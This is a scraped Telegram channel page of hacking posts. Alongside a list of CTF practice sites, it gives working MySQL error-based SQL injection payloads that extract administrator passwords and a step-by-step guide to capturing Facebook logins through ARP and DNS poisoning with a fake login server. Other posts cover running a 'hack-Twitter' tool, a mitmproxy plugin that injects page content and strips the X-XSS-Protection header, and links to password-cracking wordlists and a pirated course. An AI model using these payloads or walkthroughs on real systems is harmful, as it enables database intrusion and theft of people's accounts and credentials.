UNDERCODE SECURITY
226 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
13. RINGZER0 TEAM ONLINE CTF
RingZer0 Team Online CTF offers over 200 challenges that will allow you to test your hacking skills in multiple areas - from cryptography, malware analysis to SQL injection , shellcoding, and more. After you have found a solution to the problem, you can send it to RingZer0 Team. If your decision is accepted, you will receive RingZer0Gold, which can be exchanged for hints while solving problems.

14. HELLBOUND HACKERS
On Hellbound Hackers you can find traditional tasks with exploits and such task formats that are not available on other resources. For example, application patching and time-limited tasks. In patching tasks, you are given a vulnerable piece of code and you need to propose a fix for this vulnerability.

15. TRY2HACK
Try2Hack is one of the oldest sites for improving hacking skills and is still afloat. He offers several challenges to keep you entertained. The tasks are varied and become more difficult as you progress.

16. HACK.ME
Hack.me is a large collection of vulnerable web applications for putting your hacking skills into practice. All applications are provided by the community and each can be run on the fly in a secure, isolated sandbox.

17. HACKTHIS !!
HackThis !! consists of 50+ tasks of different levels, for solving each of which you get a certain number of points depending on the difficulty level. Similar to Hack This Site, HackThis !! There is also a lively community, numerous articles and news about hacking, and a forum where you can discuss security-related tasks and issues.

18. ENIGMA GROUP
The Enigma Group contains over 300 tasks with a focus on the top 10 OWASP exploits. The site has nearly 48,000 active members and hosts weekly CTF contests as well as weekly and monthly contests.

19. GOOGLE GRUYERE
Google Gruyere shows you how to exploit vulnerabilities in web applications and how to protect against them. You can do real penetration testing and actually hack a real application using attacks like XSS and XSRF .

20. GAME OF HACKS
Game of Hacks shows you a set of code snippets as a multi-choice quiz, and you must identify the correct vulnerability in the code. This site stands out a bit from this list, but nevertheless it's a good game to spot vulnerabilities in your code.

21. ROOT ME
Root Me offers over 200 challenges and over 50 virtual environments allowing you to practice your hacking skills in a variety of scenarios. This is definitely one of the best sites on this list.

22. CTFTIME
While CTFtime is not a hacking site like the others on this list, it is a great resource to stay up to date with CTF competitions happening around the world. Therefore, if you are interested in joining a CTF team or participating in a competition, you should take a look here.

23. PENTESTERLAB
PentesterLab is an easy and convenient way to learn pentesting . The site provides vulnerable systems that can be used to test and study vulnerabilities. In practice, you can work with real vulnerabilities both online and offline.

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘2020 Top sites for practice hacking Full list
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘why php is important in hacking ?
> What can be done in PHP

According to the official PHP site, you can:

> collect form data (login / password input, etc.);

> create dynamic content on pages;

> send and receive cookies;

> write scripts on the command line;

> execute scripts on the server side;

> develop desktop applications.

> Which companies use PHP
Facebook, Lyft, Mint, Hootsuite, Viber, Buffer, DocuSig

#fastTips
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘Pro Class - Chris Voss Teaches the Art of Negotiation β€” 7.6 GBβ€”
5 rates

https://mega.nz/folder/XslXwZBT#OP_1pb3eyX5WTTGy2DptsA
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘mysql injection error utilization method

This tutorial mainly introduces the relevant information summarized by the mysql injection error reporting method. Friends who need it can refer to

1️⃣Report an error through the floor

You can use the following code

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

> Examples are as follows:

First, make a normal query:

mysql> select * from article where id = 1;

+β€”-+β€”β€”-+β€”β€”β€”+

| id | title | content |

+β€”-+β€”β€”-+β€”β€”β€”+

| 1 | test | do it |

+β€”-+β€”β€”-+β€”β€”β€”+

If the id input is injected, you can report an error with the following statement.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key'group_key'

You can see that the version of Mysql has been successfully released. If you need to query other data, you can query by modifying the statement where version() is located.

For example, we need to query the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);

ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)* 2)));

ERROR 1062 (23000): Duplicate entry'admin8881' for key'group_key'

2️⃣ExtractValue

The test statement is as follows

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual testing process

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–

ERROR 1105 (HY000): XPATH syntax error:'\admin888'

3️⃣ UpdateXml

Test statement

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual testing process

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error:':root@localhost'

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Make A Autorun File For Ur Cd.txt
#fastTips

If you wanna make a autorun file for that CD you are ready to burn just read this...

1) You open notepad

2) now you writ: [autorun]
OPEN=INSTALL\Setup_filename.EXE
ICON=INSTALL\Setup_filename.EXE

Now save it but not as a .txt file but as a .inf file.

But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

3) Now burn your CD with the autorun .inf file included.

4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in "This Computer"

#fastTips
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Step by step Hacking Facebook Using Man in the Middle Attack:

Attacker IP Address : 192.168.160.148

Victim IP Address : 192.168.160.82

Fake Web Server : 192.168.160.148

I assume you’re in a Local Area Network now.

1) Install the XAMPP and run the APACHE and MySQL service

> http://www.apachefriends.org/en/xampp.html

2) Extract the fb.rar and copy the content to C:\xampp\htdocs

3) Check the fake web server by open it in a web browser and type http://localhost/

4) Install Cain & Abel and do the APR(ARP Poisoning Routing)
http://www.oxid.it/cain.html

5) Choose your interface for sniffing and click OK. When it’s finish, click again the Start/Stop Sniffer to activate the sniffing interface.

6) Go to the Sniffer tab and then click the + (plus sign)

7) Select "All hosts in my subnet" and Click OK.

8) You will see the other people in your network, but my target is 192.168.160.82 (MySelf…LoL :p)

9) After we got all of the information, click at the bottom of application the APR tab.

10) When you finish, now the next step is preparing to redirect the facebook.com page to the fake web server.

Click "APR DNS" and click + to add the new redirecting rule.

11) When everything is finish, just click OK. Then the next step is to activate the APR by clicking the Start/Stop APR button.


12) Now Hacking Facebook using MITM has been activated. This is how it looks like when victim opened http://www.facebook.com

13) But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker

E N J O Y β€οΈπŸ‘πŸ»
dark wiki source
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Twitter pentesting 2020 :

> Bypass credibility page ( With the help of user-email.py )

> Save / Tweet the video

> Check valid username

> Check Email

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git https://github.com/0xfff0800/hack-Twitter

2) cd hack-Twitter

3) chmod +x hack-Twitter.py

4) chmod +x user-email.py

5) python3 hack-Twitter.py

6) python3 user-email.py

> video tutorial
https://youtu.be/InonDo1dPdk

ENJOYβ€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Twitter pentesting 2020 :

> Bypass credibility page ( With the help of user-email.py )

> Save / Tweet the video

> Check valid username

> Check Email

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git https://github.com/0xfff0800/hack-Twitter

2) cd hack-Twitter

3) chmod +x hack-Twitter.py

4) chmod +x user-email.py

5) python3 hack-Twitter.py

6) python3 user-email.py

> video tutorial
https://youtu.be/InonDo1dPdk

ENJOYβ€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/extension/" automatically will be listed on Pumpkin-Proxy tab.



The Code Plugins Dev


from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate

class Nameplugin(PluginTemplate):
meta = {
'Name' : 'Nameplugin',
'Version' : '1.0',
'Description' : 'Brief description of the new plugin',
'Author' : 'by dev'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
# if you want set arguments check refer wiki more info.
self.ConfigParser = False # No require arguments

def request(self, flow):
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__ # request headers
host = flow.request.pretty_host # get domain on the fly requests
versionH = flow.request.http_version # get http version

# get redirect domains example
# pretty_host takes the "Host" header of the request into account,
if flow.request.pretty_host == "example.org":
flow.request.host = "mitmproxy.org"

# get all request Header example
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))

print flow.request.method # show method request
# the model printer data
self.send_output.emit('[NamePlugin]:: this is model for save data logging')

def response(self, flow):
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__ #convert headers for python dict
print flow.response.headers['Content-Type'] # get content type

#every HTTP response before it is returned to the client
with decoded(flow.response):
print flow.response.content # content html
flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag

del flow.response.headers["X-XSS-Protection"] # remove protection Header

flow.response.headers["newheader"] = "foo" # adds a new header
#and the new header will be added to all responses passing through the proxy

(not coded by under code)
E
N J O Y β€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
RDP Pivoting with Metasploit .pdf
1.4 MB
Full good tutorial with pictures :)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SwiftUI Injection- hack ios apps :

It is possible to inject SwiftUI applications but if you add elements to an interface or use modifiers that change their type, this changes the type of the body properties' Content which causes a crash. To avoid this you need to erase the type.

> The easiest way to do this is add the following extension to your source and use the modifier .eraseToAnyView() at the very end of any declaration of a view's body property you want to iterate over:

 var loadInjection = {
Bundle(path: "/Applications/InjectionIII.app/Contents/Resources/iOSInjection.bundle")!.load()
}()

extension View {
#if DEBUG
func eraseToAnyView() -> AnyView {
_ = loadInjection
return AnyView(self)
}
#else
func eraseToAnyView() -> some View {
return self
}
#endif
}
After this, you can put the final touches to your interface interactively on a fully live app.


πŸ¦‘FULL ALL INJECTIONS REAL CODES :
> https://github.com/johnno1962/InjectionIII


E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘Host script- termux topic - port forwards :

1) apt update

2) apt install git curl php openssh -y

3) git clone git://github.com/htr-tech/host.git

4) cd host

5) Run : bash host.sh

6) choose option via numbers
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘topic wordlists 12gb and more download for cracking :

> https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

> http://www.insidepro.team/

> https://wiki.skullsecurity.org/Passwords

> https://github.com/danielmiessler/SecLists/tree/master/Passwords

> https://github.com/berzerk0/Probable-Wordlists

> https://github.com/topics/password-cracking

E N J O Y β€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁